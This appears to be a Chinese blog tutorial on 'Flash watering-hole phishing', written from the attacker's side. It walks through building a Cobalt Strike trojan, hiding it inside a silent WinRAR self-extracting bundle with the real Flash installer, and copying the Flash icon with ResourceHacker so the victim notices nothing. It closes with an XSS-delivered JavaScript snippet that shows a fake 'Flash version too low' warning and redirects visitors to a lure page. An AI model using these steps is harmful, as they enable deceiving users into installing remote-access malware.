Flash水坑钓鱼
Flash水坑钓鱼
起因
在网络上看到许多大佬都拿这个钓鱼,而且感觉成功率贼高。
未雨绸缪,先测试一下,以后肯定用的到
准备
flash官网的钓鱼源码:https://github.com/r00tSe7en/Fake-flash.cn
一个服务器
一个域名
一个马子
先配置一个马子吧
- 使用常用的CS吧,随便来一个,成功上线

- 关于免杀,暂时就不了(因为菜)
- 推荐使用一个好的隐藏方式
自解压捆绑文件的利用
捆版木马时碰到一个问题大多捆绑软件本身就会被杀软查杀,所以选择利用winrar实现捆绑。
准备好的木马和flash安装程序
鼠标右键,添加到压缩文件。
点击创建自解压格式压缩文件

1 | 使用绝对路径 -------------- C:\windows\temp |

设置---------提取后运行
1 | C:\windows\temp\flash.exe |

- 安静模式———全部隐藏

更新
1 | 更新方式----解压并更新文件 |

- 确定,出去把文件名改的像一点

- 这图标也不像啊,得改

- 使用 ResourceHacker 把图标改了,自行下载
- 通过ResourceHacker打开原版的flash安装程序,点击Icon Group文件夹中的文件,鼠标右键保存“*.ico资源”,即可导出ico图标。

- 同样的方法—-ResourceHacker打开刚刚打包好的文件,点击Icon Group文件夹中的文件,鼠标右键替换ico图标,最后保存

- 捆绑木马就做好了。下面是运行截图,伪装的完美,全程无感知,就是没有做木马的免杀如果有杀毒软件会报毒。

- 也能上线

- 马子完成了。
上传到服务器
跟前情况自己开服务,我就直接装了了一个Apache

1 | window.alert = function(name){var iframe = document.createElement("IFRAME");iframe.style.display="none";iframe.setAttribute("src", 'data:text/plain,');document.documentElement.appendChild(iframe);window.frames[0].window.alert(name);iframe.parentNode.removeChild(iframe);};alert("您的FLASH版本过低,请尝试升级后访问改页面!");window.location.href="https://www.baidu.com"; |
可以直接在XSS平台里面建一个模块,然后xss打出去,要不太长了代码
All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.




